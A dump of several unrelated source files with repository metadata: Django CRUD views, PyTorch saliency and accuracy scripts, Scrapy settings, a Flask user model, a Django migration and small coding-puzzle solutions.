from academicos.models import Coordinador, Escuela, Facultad
from django.http import HttpResponse, HttpResponseRedirect
from django.template import RequestContext
from asistentes.models import Persona
from asistentes.forms import *
#from django.core.mail import EmailMessage
#from django.contrib.auth.forms import UserCreationForm, AuthenticationForm
#from django.contrib.auth import login, authenticate, logout
#from django.contrib.auth.decorators import login_required
from academicos.forms import CoordinadorForm, EscuelaForm, FacultadForm
def Cordinadores(request):
cordinadores = Coordinador.objects.all()
titulo = "Lista de Cordinadores"
return render_to_response('academicos/cordinadoresList.html',{
'cordinadores':cordinadores,'titulo':titulo},
context_instance=RequestContext(request))
def Cordinador_add(request):
if request.method == "POST":
formulario = CoordinadorForm(request.POST)
if formulario.is_valid():
formulario.save()
return HttpResponseRedirect('/cordinadoresList/')
else:
formulario = CoordinadorForm()
return render_to_response('academicos/cordinadoresAdd.html',
{'formulario': formulario},
context_instance = RequestContext(request))
def Cordinador_edit (request, id):
cordinador_edit= Coordinador.objects.get(pk=id)
if request.method == 'POST':
formulario = CoordinadorForm(
request.POST, instance = cordinador_edit)
if formulario.is_valid():
formulario.save()
return HttpResponseRedirect("/cordinadoresList/")
else:
formulario = CoordinadorForm(instance= cordinador_edit)
return render_to_response('academicos/cordinadoresEdit.html',
{'formulario': formulario},
context_instance = RequestContext(request))
def Cordinador_borrar (request, id):
cordinador_borrar = get_object_or_404(Coordinador, pk=id)
cordinador_borrar.delete()
return HttpResponseRedirect("/cordinadoresList/")
def Escuelas(request):
escuelas = Escuela.objects.all()
titulo = "Lista de Escuelas"
return render_to_response('academicos/escuelasList.html',
{'escuelas':escuelas,'titulo':titulo},
context_instance=RequestContext(request))
def Escuela_add (request):
if request.method == "POST":
formulario = EscuelaForm(request.POST)
if formulario.is_valid():
formulario.save()
return HttpResponseRedirect('/escuelaList/')
else:
formulario = EscuelaForm()
return render_to_response('academicos/escuelasAdd.html',
{'formulario':formulario},
context_instance=RequestContext(request))
def Escuela_edit (request, id):
escuela_edit= Escuela.objects.get(pk=id)
if request.method == 'POST':
formulario = EscuelaForm(
request.POST, instance = escuela_edit)
if formulario.is_valid():
formulario.save()
return HttpResponseRedirect("/escuelaList/")
else:
formulario = EscuelaForm(instance= escuela_edit)
return render_to_response('academicos/escuelasEdit.html',
{'formulario': formulario},
context_instance = RequestContext(request))
def Escuelas_borrar (request, id):
escuelas_borrar = get_object_or_404(Escuela, pk=id)
escuelas_borrar.delete()
return HttpResponseRedirect("/escuelaList/")
def Facultades(request):
facultades = Facultad.objects.all()
titulo = "Lista de Facultades"
return render_to_response('academicos/facultadList.html',{
'facultades':facultades,'titulo':titulo},
context_instance=RequestContext(request))
def Facultad_add(request):
if request.method == "POST":
formulario = FacultadForm(request.POST)
if formulario.is_valid():
formulario.save()
return HttpResponseRedirect('/facultadesList/')
else:
formulario = FacultadForm()
return render_to_response('academicos/facultadAdd.html',
{'formulario': formulario},
context_instance = RequestContext(request))
def Facultad_edit (request, id):
facultad_edit= Facultad.objects.get(pk=id)
if request.method == 'POST':
formulario = FacultadForm(
request.POST, instance = facultad_edit)
if formulario.is_valid():
formulario.save()
return HttpResponseRedirect("/facultadesList/")
else:
formulario = FacultadForm(instance= facultad_edit)
return render_to_response('academicos/facultadEdit.html',
{'formulario': formulario},
context_instance = RequestContext(request))
def Facultad_borrar (request, id):
facultad_borrar = get_object_or_404(Facultad, pk=id)
facultad_borrar.delete()
return HttpResponseRedirect("/facultadesList/")
| [
"[email protected]"
] | |
44325715254c5869560d81e2367ac008235b3da6 | 6fa7f99d3d3d9b177ef01ebf9a9da4982813b7d4 | /r9y4yrSAGRaqTT7nM_21.py | 1ca7a31c9dbf3fb55b5622f3aa279dfb1fc15050 | [] | no_license | daniel-reich/ubiquitous-fiesta | 26e80f0082f8589e51d359ce7953117a3da7d38c | 9af2700dbe59284f5697e612491499841a6c126f | refs/heads/master | 2023-04-05T06:40:37.328213 | 2021-04-06T20:17:44 | 2021-04-06T20:17:44 | 355,318,759 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 121 | py |
find_missing=lambda l:sum(range(len(min(l,key=len)),len(max(l,key=len))+1))-sum(len(x)for x in l)if l and all(l)else 0
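# Expanded equivalent (added for readability; a hypothetical helper, not in
# the original submission). The lambda above sums the full range of list
# lengths from the shortest to the longest, then subtracts the lengths that
# are actually present, leaving the single missing length.
def find_missing_verbose(lists):
    if not lists or not all(lists):  # empty input, or an empty sub-list
        return 0
    shortest = len(min(lists, key=len))
    longest = len(max(lists, key=len))
    return sum(range(shortest, longest + 1)) - sum(len(x) for x in lists)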
| [
"[email protected]"
] | |
25fba7312e0c89bdf77f6d597d2878f52fb8b372 | b7f1557e5a2ac164e59918efe3ac07f781699012 | /code/baseline/gen_result.py | 51d7c2fe3e27ce9a5fc0fe602528bc020e967593 | [] | no_license | aspnetcs/AT-CNN | 2dfeb1928df9521ac5a5c8f9bb8d082ad9237b2a | 46d1dfa599c186def93d48e1589b02f111a67599 | refs/heads/master | 2022-12-25T19:40:41.036715 | 2020-10-06T00:50:05 | 2020-10-06T00:50:05 | 299,809,649 | 0 | 0 | null | 2020-09-30T04:35:24 | 2020-09-30T04:35:24 | null | UTF-8 | Python | false | false | 11,444 | py | from utils import GetSmoothGrad, clip_and_save_single_img, clip_gradmap
import os
from cv2 import imwrite, imread
import argparse
import torch
import numpy as np
import torch
from utils import get_a_set
import torch.nn.functional as F
import torch.nn as nn
from dataset import create_test_dataset, create_train_dataset, \
create_saturation_test_dataset, create_edge_test_dataset, \
create_style_test_dataset, create_brighness_test_dataset, create_patch_test_dataset
import torchvision.models as models
import skimage.io as io
def GetSmoothRes(net, Data, DEVICE, save_path ='./SmoothRes/Fashion_MNIST'):
for i, (img, label) in enumerate(zip(Data.X, Data.Y)):
#print(i)
#print(img.shape, label.shape)
img = img.astype(np.float32)
#label = label.astype(np.float32)
img = img[np.newaxis,:]
img = torch.tensor(img)
#print(img.type())
label = torch.tensor(label).type(torch.LongTensor)
grad_map = GetSmoothGrad(net, img, label, DEVICE = DEVICE)
grad_map = grad_map.cpu().detach().numpy()
grad_map = clip_gradmap(grad_map)
#print(grad_map.shape, grad_map.mean())
save_p = os.path.join(save_path, '{}.png'.format(i))
#print(grad_map.shape)
imwrite(save_p, grad_map)
print('{} imgs saved in {}'.format(i+1, save_path))
def get_result(net, dl, DEVICE, net_name = ''):
save_bench = '../../data/benchmark/'
save_path = os.path.join('../../SmoothRes/', net_name)
labels = []
net.eval()
mean = torch.tensor(np.array([0.485, 0.456, 0.406]).astype(np.float32)[np.newaxis, :, np.newaxis, np.newaxis])
std = torch.tensor(np.array([0.229, 0.224, 0.225]).astype(np.float32)[np.newaxis, :, np.newaxis, np.newaxis])
mean = mean.to(DEVICE)
std = std.to(DEVICE)
for i, (batch_img, batch_label) in enumerate(dl):
if i> 5:
break
for j in range(int(batch_img.size(0))):
img = batch_img[j]
label = batch_label[j]
img = img.to(DEVICE)
label = label.to(DEVICE)
#print(img.size())
grad_map = GetSmoothGrad(net, img, label, DEVICE, stdev_spread = 0.05)
#print(grad_map.shape)
clip_and_save_single_img(grad_map, i * batch_img.size(0) + j, save_dir=save_path)
#print(grad.shape)
#simg = (img + mean) * std
simg = img * std + mean
#print('rb', simg.max(), simg.min())
simg = torch.clamp(simg, 0, 1)
#print('r', simg.max(), simg.min())
simg = simg.detach().cpu().numpy() * 255.0
#print(simg.shape)
#print(simg.shape)
simg = simg[0]
simg = np.transpose(simg, (1, 2, 0)).astype(np.uint8)
#print('r', simg.max(), simg.min())
#imwrite(os.path.join(save_bench, '{}.png'.format(i * batch_img.size(0) + j)), simg)
io.imsave(os.path.join(save_bench, '{}.png'.format(i * batch_img.size(0) + j)), simg)
print(i * batch_img.size(0) + j)
#grad = imread(os.path.join(save_path, '{}-smooth.png'.format(i * batch_img.size(0) + j)))
grad = io.imread(os.path.join(save_path, '{}-smooth.png'.format(i * batch_img.size(0) + j)),
as_gray = False)
# if gray
# grad = grad[:, :, np.newaxis]
# grad = np.repeat(grad, 3, axis = 2)
gray_grad = np.mean(grad, axis = -1, keepdims = True)
gray_grad = gray_grad.astype(np.uint8)
gray_grad = np.repeat(gray_grad, 3, axis = 2)
pair_img = np.concatenate((gray_grad, grad, simg), axis=1)
#imwrite(os.path.join(save_path, '{}-pair.png'.format(i * batch_img.size(0) + j)), pair_img)
io.imsave(os.path.join(save_path, '{}-pair.png'.format(i * batch_img.size(0) + j)), pair_img)
labels.append(batch_label.numpy())
labels = np.array(labels)
np.savetxt(os.path.join(save_bench, 'label.txt'), labels.reshape(-1))
#MakeVisual(save_bench, save_path)
def l1_for_without_smooth(net, dl, DEVICE):
net.eval()
net.to(DEVICE)
#criterion = nn.CrossEntropyLoss().to(DEVICE)
l1s = []
for i, (batch_img, batch_label) in enumerate(dl):
#if i> 5:
# break
for j in range(int(batch_img.size(0))):
img = batch_img[j]
label = batch_label[j]
img = img.to(DEVICE)
label = label.to(DEVICE)
#print(img.size())
grad_map = GetSmoothGrad(net, img, label, DEVICE, stdev_spread = 0.05, num=32)
#print(grad_maps.size(), batch_img.size())
l1s.append(torch.norm(grad_map, 1).item())
l1s = np.array(l1s)
print("Min: {:.4f} -- Max: {:.2f} -- Mean:{:.2f}".format(l1s.min(), l1s.max(), l1s.mean()))
def l1_for_with_smooth(net, dl, DEVICE):
net.eval()
net.to(DEVICE)
criterion = nn.CrossEntropyLoss().to(DEVICE)
l1s = []
for i, (batch_img, batch_label) in enumerate(dl):
batch_img = batch_img.to(DEVICE)
batch_label = batch_label.to(DEVICE)
batch_img.requires_grad = True
pred = net(batch_img)
loss = criterion(pred, batch_label)
grad_maps = torch.autograd.grad(loss, batch_img, create_graph=True, only_inputs=False)[0]
#print(grad_maps.size(), batch_img.size())
l1s.append(torch.norm(grad_maps, 1).item())
l1s = np.array(l1s)
print("Min: {:.2f} -- Max: {:.2f} -- Mean:{:.2f}".format(l1s.min(), l1s.max(), l1s.mean()))
def MakeVisual(data_dir = './benchmark/CIFAR', result_dir = './SmoothRes/CIFAR/'):
save_p = result_dir.split('/')[:-1]
save_p = os.path.join(*save_p)
print(save_p)
net_name = result_dir.split('/')[-1]
labels = np.loadtxt(os.path.join(data_dir, 'label.txt'))
imgs = get_a_set(labels, result_dir, data_dir, times = 3)
print(os.path.join(save_p, '{}.png'.format(net_name)))
imwrite(os.path.join(save_p, '{}.png'.format(net_name)), imgs)
def test_model(net, dl):
acc1s = []
acc3s = []
net.eval()
for i, (batch_img, batch_label) in enumerate(dl):
batch_img = batch_img.to(DEVICE)
batch_label = batch_label.to(DEVICE)
pred = net(batch_img)
acc1, acc3 = torch_accuracy(pred, batch_label)
acc1s.append(acc1)
acc3s.append(acc3)
acc1s = np.array(acc1s)
acc3s = np.array(acc3s)
print('accuracy top-1: {} top-3: {}'.format(acc1s.mean(), acc3s.mean()))
def test_model_genera(net, dl, dl_teacher):
acc1s = []
acc3s = []
aacc1s = []
aacc3s = []
net.eval()
dl_teacher = enumerate(dl_teacher)
with torch.no_grad():
for i, (batch_img, batch_label) in enumerate(dl):
j, (teacher_img, _) = next(dl_teacher)
#print(torch.sum(torch.eq(_, batch_label).float()))
teacher_img = teacher_img.to(DEVICE)
batch_img = batch_img.to(DEVICE)
batch_label = batch_label.to(DEVICE)
pred = net(batch_img)
teacher = net(teacher_img)
acc1, acc3 = torch_genera_accuracy(pred, batch_label, teacher)
aacc1, aacc3 = torch_accuracy(pred, batch_label)
tacc1, tacc3 = torch_accuracy(teacher, batch_label)
acc1 = (acc1 / tacc1) * 100
acc3 = (acc3 / tacc3) * 100
acc1s.append(acc1)
acc3s.append(acc3)
aacc1s.append(aacc1)
aacc3s.append(aacc3)
acc1s = np.array(acc1s)
acc3s = np.array(acc3s)
aacc1s = np.array(aacc1s)
aacc3s = np.array(aacc3s)
print('accuracy top-1: {:.2f} top-3: {:.2f}'.format(acc1s.mean(), acc3s.mean()))
print('Absolute accuracy top-1: {:.2f} top-3: {:.2f}'.format(aacc1s.mean(), aacc3s.mean()))
def torch_accuracy(output, target, topk = (1, 3)):
'''
param output, target: should be torch Variable
'''
#assert isinstance(output, torch.cuda.Tensor), 'expecting Torch Tensor'
#assert isinstance(target, torch.Tensor), 'expecting Torch Tensor'
#print(type(output))
topn = max(topk)
batch_size = output.size(0)
_, pred = output.topk(topn, 1, True, True)
pred = pred.t()
is_correct = pred.eq(target.view(1, -1).expand_as(pred))
ans = []
for i in topk:
is_correct_i = is_correct[:i].view(-1).float().sum(0, keepdim = True)
ans.append(is_correct_i.mul_(100.0 / batch_size))
return ans
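# Worked example (added): with output = [[0.1, 0.9], [0.8, 0.2]] and
# target = [1, 1], the top-1 prediction is correct for the first row only,
# so torch_accuracy(output, target, topk=(1,)) returns [tensor([50.])] --
# the values are percentages of the batch, not fractions.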
def torch_genera_accuracy(output, target, teacher, topk = (1, 3)):
'''
param output, target: should be torch Variable
'''
#assert isinstance(output, torch.cuda.Tensor), 'expecting Torch Tensor'
#assert isinstance(target, torch.Tensor), 'expecting Torch Tensor'
#print(type(output))
topn = max(topk)
batch_size = output.size(0)
_, pred = output.topk(topn, 1, True, True)
pred = pred.t()
_, teacher_pred = teacher.topk(topn, 1, True, True)
teacher_pred = teacher_pred.t()
is_correct = pred.eq(target.view(1, -1).expand_as(pred))
is_teacher_correct = teacher_pred.eq(target.view(1, -1).expand_as(teacher_pred))
ans = []
for i in topk:
is_correct_i = is_correct[:i].view(-1).float()# .sum(0, keepdim = True)
is_teacher_correct_i = is_teacher_correct[:i].view(-1).float()
genera_correct_i = is_correct_i * is_teacher_correct_i
genera_correct_i = genera_correct_i.sum(0, keepdim = True)
#ans.append(is_correct_i.mul_(100.0 / batch_size))
ans.append(genera_correct_i.mul_(100.0 / batch_size))
return ans
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('--resume', type = str,
default='../exps/tradeoff.eps8/checkpoint.pth.tar')
parser.add_argument('-d', type = int, default=1)
parser.add_argument('-p', type = float, default=None, help = 'saturation level; 2 unchanged')
parser.add_argument('-b', type=float, default=None, help='brightness level; 1 unchanged')
parser.add_argument('-e', action = 'store_true', default=False, help='Edges?')
parser.add_argument('-k', type=int, default=None, help='patch num')
args = parser.parse_args()
net_name = args.resume.split('/')[-2]
print(net_name)
path = os.path.join('../../SmoothRes', net_name)
if not os.path.exists(path):
os.mkdir(path)
net = models.resnet18(pretrained=False)
net.fc = nn.Linear(512, 257)
net.load_state_dict(torch.load(args.resume)['state_dict'])
DEVICE = torch.device('cuda:{}'.format(args.d))
net.to(DEVICE)
dl_teacher = create_test_dataset(32)
if args.p is None and args.b is None:
dl = create_test_dataset(32)
if args.b is not None and args.p is None:
dl = create_brighness_test_dataset(batch_size = 32,
root = './', bright_level = args.b)
if args.p is not None and args.b is None:
dl = create_saturation_test_dataset(32, root = './', saturation_level = args.p)
if args.k is not None:
print('Creating path data')
dl = create_patch_test_dataset(32, './', args.k)
# style
#dl = create_style_test_dataset(32)
#xz_test(dl, 1,net, DEVICE)
#test_model(net, dl)
test_model_genera(net, dl, dl_teacher)
#l1_for_without_smooth(net, dl, DEVICE)
#l1_for_with_smooth(net, dl, DEVICE)
#get_result(net, dl, DEVICE, net_name)
| [
"[email protected]"
] | |
c5d9cf121b69761030d0050d73f56d251f3b3b8d | a57eb85856cc93a389b815276765a06019d6f8d4 | /manage.py | a187e1a5e09bc71ad51ec80483e4c11d9cced0d9 | [
"MIT"
] | permissive | astrofrog/multistatus | 205f6ad9a06995bc4b418f6d0de222c4dacfcb79 | f63042c9e85cb4e58e3768a65f4684be07e432d1 | refs/heads/master | 2021-01-10T21:05:40.370555 | 2014-12-09T10:24:48 | 2014-12-09T10:24:48 | 22,805,918 | 0 | 1 | null | 2014-12-09T10:23:13 | 2014-08-10T09:39:38 | Python | UTF-8 | Python | false | false | 257 | py | #!/usr/bin/env python3.4
import os
import sys
if __name__ == "__main__":
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "multistatus.settings")
from django.core.management import execute_from_command_line
execute_from_command_line(sys.argv)
| [
"[email protected]"
] | |
10d541866288a328b07bc1a9602e1afcbb87583f | 994461efa08e71403b2a1c0598391fddf3b44b87 | /june-leetcoding-challenge/d5-random-pick-with-weight.py | 65d47a61d6766e106ff6b66178910de5a81e3489 | [] | no_license | pkdism/leetcode | 26f16f9211ddfdef8e0fe74c9268e6a48da64717 | 589652ae727331d1f962d22a020fc6ae09bfcea4 | refs/heads/master | 2020-12-11T15:48:01.116731 | 2020-08-16T18:31:03 | 2020-08-16T18:31:03 | 233,889,125 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 947 | py | """
Given an array w of positive integers,
where w[i] describes the weight of index i,
write a function pickIndex which randomly picks an index in proportion to its weight.
"""
import random
class Solution:
def __init__(self, w: List[int]):
self.w = w
self.n = len(self.w)
self.arr = []
self.curr = 0
for x in w:
self.curr += x
self.arr.append(self.curr)
def pickIndex(self) -> int:
# print(self.arr)
n = len(self.arr)
r = random.randrange(1, self.arr[-1] + 1)
l = 0
h = n-1
while l < h:
m = (l+h)//2
# if self.arr[m] == r:
# return m
if self.arr[m] < r:
l = m + 1
else:
h = m
return l
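# Note (added): since self.arr holds non-decreasing prefix sums, the manual
# binary search above is equivalent to the standard-library call
#   bisect.bisect_left(self.arr, r)
# assuming `import bisect` at the top of the file.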
# Your Solution object will be instantiated and called as such:
# obj = Solution(w)
# param_1 = obj.pickIndex() | [
"[email protected]"
] | |
488eedf2868298347e8fd761a86a7501687b5a22 | cc6e8b20a64940f2ad83be6a03134e8b105514e7 | /webviz/viz/migrations/0001_initial.py | 71fcb033e7e32232e310b0dfc022cfe73f08c521 | [
"MIT"
] | permissive | JagritiG/django-webviz | 50654c4fe76b1653f64e404c45d674d5d179e236 | 213489bb3a70019ca9cff5d127fd6d0c06bc61d6 | refs/heads/main | 2023-04-27T01:21:04.195996 | 2021-05-16T22:30:04 | 2021-05-16T22:30:04 | 353,126,658 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 552 | py | # Generated by Django 3.1.7 on 2021-03-30 18:58
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Csv',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('title', models.CharField(max_length=100)),
('csv', models.FileField(upload_to='media/csvs/')),
],
),
]
| [
"[email protected]"
] | |
f197241de30622889b167ecb7dc068406820dbc8 | 6061ebee9fbce8eb5b48ed7ccd2aecb196156598 | /modulo07-funcoes/exercicios/exercicio04.py | 5ebbfcd3edf545e7ffdc636929ca0276708ef06c | [] | no_license | DarioCampagnaCoutinho/logica-programacao-python | fdc64871849bea5f5bbf2c342db5fda15778110b | b494bb6ef226c89f4bcfc66f964987046aba692d | refs/heads/master | 2023-02-24T11:45:29.551278 | 2021-01-26T22:02:49 | 2021-01-26T22:02:49 | 271,899,650 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 141 | py | def aumento(numero, valor):
resultado = numero * valor / 100
return resultado + numero
resultado = aumento(100, 50)
print(resultado) | [
"[email protected]"
] | |
b936c098695eb03ec4c9abb82e78537b33edc5f3 | b7a2a80843fa5141ffb9c7b4439f1d2ac713af30 | /UT2_Morsen.py | f0f71ad6765a17297467d402ad1566da64d52c4e | [] | no_license | wunnox/python_grundlagen | df1bc2b9b1b561bd6733ccc25305e799a48e714e | fa84d7aae7332a7acbb3ba7ff0fe2216cc345fc0 | refs/heads/master | 2023-05-01T12:19:23.208445 | 2023-04-16T11:29:01 | 2023-04-16T11:29:01 | 222,099,539 | 2 | 3 | null | 2019-12-19T10:56:43 | 2019-11-16T12:57:54 | Python | UTF-8 | Python | false | false | 450 | py | #!/usr/local/bin/python3
####################################################
#
# Exercise UT2_Morsen.py:
# Create a program that, based on a Morse table,
# outputs a text as Morse code.
# Use the module UT2_Morsecodes.py for this.
#
####################################################
import UT2_Morsecodes as mc
w = input('-> ')  # read in the word
w = w.replace(' ', '_')
for l in w:
print(mc.morse(l), end=' ')
print()
| [
"[email protected]"
] | |
1c3ea9c37220f04f5ec059b8d964947f7d2508f6 | c31e69b763e1b52d3cefa4f5a49432ae966f22d0 | /day29/mySpider/mySpider/settings.py | 4e3e3faf4c4eeff43f7ccf6f99bfd3381a22506f | [] | no_license | lvah/201901python | cbda174a3c97bc5a2f732c8e16fc7cf8451522d2 | 7bffe04a846f2df6344141f576820730a7bbfa6a | refs/heads/master | 2022-12-13T09:49:29.631719 | 2019-04-06T09:48:33 | 2019-04-06T09:48:33 | 165,477,671 | 3 | 0 | null | 2022-12-08T04:57:01 | 2019-01-13T07:23:44 | HTML | UTF-8 | Python | false | false | 3,413 | py | # -*- coding: utf-8 -*-
# Scrapy settings for mySpider project
#
# For simplicity, this file contains only settings considered important or
# commonly used. You can find more settings consulting the documentation:
#
# https://doc.scrapy.org/en/latest/topics/settings.html
# https://doc.scrapy.org/en/latest/topics/downloader-middleware.html
# https://doc.scrapy.org/en/latest/topics/spider-middleware.html
BOT_NAME = 'mySpider'
SPIDER_MODULES = ['mySpider.spiders']
NEWSPIDER_MODULE = 'mySpider.spiders'
# Crawl responsibly by identifying yourself (and your website) on the user-agent
#USER_AGENT = 'mySpider (+http://www.yourdomain.com)'
# Obey robots.txt rules
# ROBOTSTXT_OBEY = True
ROBOTSTXT_OBEY = False
# Configure maximum concurrent requests performed by Scrapy (default: 16)
#CONCURRENT_REQUESTS = 32
# Configure a delay for requests for the same website (default: 0)
# See https://doc.scrapy.org/en/latest/topics/settings.html#download-delay
# See also autothrottle settings and docs
#DOWNLOAD_DELAY = 3
# The download delay setting will honor only one of:
#CONCURRENT_REQUESTS_PER_DOMAIN = 16
#CONCURRENT_REQUESTS_PER_IP = 16
# Disable cookies (enabled by default)
#COOKIES_ENABLED = False
# Disable Telnet Console (enabled by default)
#TELNETCONSOLE_ENABLED = False
# Override the default request headers:
#DEFAULT_REQUEST_HEADERS = {
# 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
# 'Accept-Language': 'en',
#}
# Enable or disable spider middlewares
# See https://doc.scrapy.org/en/latest/topics/spider-middleware.html
#SPIDER_MIDDLEWARES = {
# 'mySpider.middlewares.MyspiderSpiderMiddleware': 543,
#}
# Enable or disable downloader middlewares
# See https://doc.scrapy.org/en/latest/topics/downloader-middleware.html
#DOWNLOADER_MIDDLEWARES = {
# 'mySpider.middlewares.MyspiderDownloaderMiddleware': 543,
#}
# Enable or disable extensions
# See https://doc.scrapy.org/en/latest/topics/extensions.html
#EXTENSIONS = {
# 'scrapy.extensions.telnet.TelnetConsole': None,
#}
# Configure item pipelines
# See https://doc.scrapy.org/en/latest/topics/item-pipeline.html
MOOCFilename = "mooc.txt"
ITEM_PIPELINES = {
    # Pipeline location: priority, 0~1000; the smaller the number, the higher the priority.
'mySpider.pipelines.MyspiderPipeline': 300,
'mySpider.pipelines.CsvPipeline': 400,
'mySpider.pipelines.MysqlPipeline': 500,
'mySpider.pipelines.ImagePipeline': 200,
}
IMAGES_STORE = '/root/PycharmProjects/day29/mySpider/img'
# Enable and configure the AutoThrottle extension (disabled by default)
# See https://doc.scrapy.org/en/latest/topics/autothrottle.html
#AUTOTHROTTLE_ENABLED = True
# The initial download delay
#AUTOTHROTTLE_START_DELAY = 5
# The maximum download delay to be set in case of high latencies
#AUTOTHROTTLE_MAX_DELAY = 60
# The average number of requests Scrapy should be sending in parallel to
# each remote server
#AUTOTHROTTLE_TARGET_CONCURRENCY = 1.0
# Enable showing throttling stats for every response received:
#AUTOTHROTTLE_DEBUG = False
# Enable and configure HTTP caching (disabled by default)
# See https://doc.scrapy.org/en/latest/topics/downloader-middleware.html#httpcache-middleware-settings
#HTTPCACHE_ENABLED = True
#HTTPCACHE_EXPIRATION_SECS = 0
#HTTPCACHE_DIR = 'httpcache'
#HTTPCACHE_IGNORE_HTTP_CODES = []
#HTTPCACHE_STORAGE = 'scrapy.extensions.httpcache.FilesystemCacheStorage'
| [
"[email protected]"
] | |
f8bf11e12bc1581ed30ac99f941e2bf0f33f766b | 80ae9b5cfb45b6e9cf7873ef7c46e17e117e4019 | /data/HackerRank-ProblemSolving/Counting Valleys.py | 8dd7bd82fe261f99bf7584a8856d457b1d55009b | [] | no_license | Ritvik19/CodeBook | ef7764d89b790e902ede5802f36d5ca910d8a50e | 2b4ed7938bbf156553d6ba5cba6216449528f0fc | refs/heads/master | 2021-07-04T08:25:52.478719 | 2020-08-08T06:54:14 | 2020-08-08T06:54:14 | 138,744,302 | 3 | 0 | null | null | null | null | UTF-8 | Python | false | false | 523 | py | #!/bin/python3
import math
import os
import random
import re
import sys
def countingValleys(n, s):
    count = 0
    topography = 0
    for step in s:
        if step == 'D':
            topography -= 1
        else:
            topography += 1
            # A valley ends only when we climb back up to sea level;
            # counting every return to zero would also count mountains.
            if topography == 0:
                count += 1
    return count
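# Worked example (added): for s = 'UDDDUDUU' the hiker dips below sea level
# once and climbs back up, so countingValleys(8, 'UDDDUDUU') == 1.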
if __name__ == '__main__':
fptr = open(os.environ['OUTPUT_PATH'], 'w')
n = int(input())
s = input()
result = countingValleys(n, s)
fptr.write(str(result) + '\n')
fptr.close()
| [
"[email protected]"
] | |
ffd754dfcd3f8ce81ed63d9d1957b3c012840687 | f63d8037abd95550bbf19820bbbf63fe004ea027 | /apps/auth/models.py | e887c3348f0f68c9ec65dc5781584c4c4638ab2f | [] | no_license | lsdlab/flask_socketio_celery | 6595e0fdc6534e4c3988b2e895194ba6f2302c53 | 84870110641feb8e49d9f45271894a66e202b7ec | refs/heads/master | 2020-03-24T20:54:47.793077 | 2018-08-01T04:33:54 | 2018-08-01T04:33:54 | 143,003,268 | 0 | 1 | null | 2018-08-24T01:54:32 | 2018-07-31T11:08:36 | Python | UTF-8 | Python | false | false | 2,521 | py | import datetime as dt
from flask_login import UserMixin
from apps.database import (Column, Model, SurrogatePK, db,
reference_col, relationship)
from apps.extensions import bcrypt
class Role(SurrogatePK, Model):
"""A role for a user."""
__tablename__ = 'auth_roles'
name = Column(db.String(80), unique=True, nullable=False)
user_id = reference_col('auth_users', nullable=True)
user = relationship('User', backref='roles')
def __init__(self, name, **kwargs):
"""Create instance."""
db.Model.__init__(self, name=name, **kwargs)
def __repr__(self):
"""Represent instance as a unique string."""
return '<Role({name})>'.format(name=self.name)
class User(UserMixin, SurrogatePK, Model):
"""A user of the app."""
__tablename__ = 'auth_users'
username = Column(db.String(80), unique=True, nullable=False)
email = Column(db.String(80), unique=True, nullable=True)
#: The hashed password
password = Column(db.Binary(128), nullable=False)
created_at = Column(db.DateTime, nullable=False, default=dt.datetime.now)
first_name = Column(db.String(30), nullable=True)
last_name = Column(db.String(30), nullable=True)
active = Column(db.Boolean(), default=False)
is_admin = Column(db.Boolean(), default=False)
sid = Column(db.String(80), nullable=True, default='')
def __init__(self, username, password=None, **kwargs):
"""Create instance."""
db.Model.__init__(self, username=username, **kwargs)
if password:
self.set_password(password)
else:
self.password = None
def set_password(self, password):
"""Set password."""
self.password = bcrypt.generate_password_hash(password)
def check_password(self, value):
"""Check password."""
return bcrypt.check_password_hash(self.password, value)
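    # Illustrative usage (added; not part of the original module):
    #   user = User(username='alice', password='s3cret')
    #   user.check_password('s3cret')   # -> True
    #   user.check_password('wrong')    # -> False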
@property
def full_name(self):
"""Full user name."""
return '{0} {1}'.format(self.first_name, self.last_name)
def __repr__(self):
"""Represent instance as a unique string."""
return '<User({username!r})>'.format(username=self.username)
def to_json(self):
return {
'id': self.id,
'username': self.username,
'email': self.email,
'active': self.active,
'is_admin': self.is_admin,
'sid': self.sid,
'created_at': self.created_at.strftime("%Y-%m-%d %H:%M:%S")
}
| [
"[email protected]"
] | |
89588f1507285e3312add597434439152e7280fa | 7a3696072a511acc4974bb76004b315a35a106b7 | /SS-GCNs/SS-GMNN-GraphMix/GraphMix-clu/trainer.py | 0a339f94160ac998022247c886c38f0cec71a1bd | [
"MIT"
] | permissive | xyh97/graph_representation | 859e9f2ff911058db251fd6547098968960c6739 | e6967073a951cd029651389d4b76606f9cef7f6c | refs/heads/main | 2023-03-23T00:55:52.763740 | 2021-03-19T17:15:40 | 2021-03-19T17:15:40 | 343,223,074 | 3 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,909 | py | import math
import random
import numpy as np
import torch
from torch import nn
from torch.nn import init
from torch.autograd import Variable
import torch.nn.functional as F
from torch.optim import Optimizer
bce_loss = nn.BCELoss().cuda()
softmax = nn.Softmax(dim=1).cuda()
class_criterion = nn.CrossEntropyLoss().cuda()
def mixup_criterion(y_a, y_b, lam):
return lambda criterion, pred: lam * criterion(pred, y_a) + (1 - lam) * criterion(pred, y_b)
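# Illustrative usage (added; the variable names here are hypothetical):
#   criterion_fn = mixup_criterion(y_a, y_b, lam)
#   loss = criterion_fn(class_criterion, pred)
# i.e. the returned closure blends the criterion evaluated against both
# sets of mixed-up targets, weighted by lam and (1 - lam).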
def get_optimizer(name, parameters, lr, weight_decay=0):
if name == 'sgd':
return torch.optim.SGD(parameters, lr=lr, weight_decay=weight_decay)
elif name == 'rmsprop':
return torch.optim.RMSprop(parameters, lr=lr, weight_decay=weight_decay)
elif name == 'adagrad':
return torch.optim.Adagrad(parameters, lr=lr, weight_decay=weight_decay)
elif name == 'adam':
return torch.optim.Adam(parameters, lr=lr, weight_decay=weight_decay)
elif name == 'adamax':
return torch.optim.Adamax(parameters, lr=lr, weight_decay=weight_decay)
else:
raise Exception("Unsupported optimizer: {}".format(name))
def change_lr(optimizer, new_lr):
for param_group in optimizer.param_groups:
param_group['lr'] = new_lr
class Trainer(object):
def __init__(self, opt, model, partition_labels, ema= True):
partition_num = partition_labels.max() + 1
self.partition_labels = partition_labels.cuda()
